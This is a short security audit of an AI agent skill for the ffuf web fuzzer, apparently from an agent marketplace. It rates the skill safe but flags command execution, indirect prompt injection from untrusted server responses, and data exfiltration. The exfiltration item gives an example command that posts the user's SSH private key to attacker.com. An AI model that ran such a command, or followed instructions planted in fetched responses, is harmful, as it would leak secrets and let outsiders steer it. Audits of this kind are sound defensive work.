skills/aeondave/malskill/ffuf/Gen Agent Trust Hub

ffuf

Pass

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: SAFECOMMAND_EXECUTIONINDIRECT_PROMPT_INJECTIONDATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION]: The skill documentation provides extensive command-line templates for the ffuf tool. The agent is encouraged to construct and execute complex shell commands involving recursion, custom headers, and POST data. This grants the agent a high degree of autonomy in generating network traffic and interacting with shell environments.
  • [INDIRECT_PROMPT_INJECTION]: The skill is designed to ingest large volumes of untrusted data from web endpoints (directory names, API responses, headers). There are no explicit instructions for the agent to sanitize this data or ignore embedded instructions that might be present in the responses. A malicious server could return content designed to influence the agent's next steps in a pipeline.
  • Ingestion points: The skill reads response bodies, status codes, and headers from targeted web servers via the ffuf tool.
  • Boundary markers: No explicit boundary markers or 'ignore' instructions are provided in the skill definitions.
  • Capability inventory: The skill utilizes significant network capabilities and file writing (-o flag) via the ffuf binary.
  • Sanitization: No data sanitization or validation of the remote response content is performed.
  • [DATA_EXFILTRATION]: While not explicitly malicious, the capability to send custom headers and POST data (-H, -d) combined with wordlist iteration can be used to exfiltrate local data or environment variables if the agent is manipulated into doing so (e.g., ffuf -u http://attacker.com/ -d "$(cat ~/.ssh/id_rsa)").
Audit Metadata
Risk Level
SAFE
Analyzed
Sep 15, 2026, 09:56 AM
Security Audit — agent-trust-hub — ffuf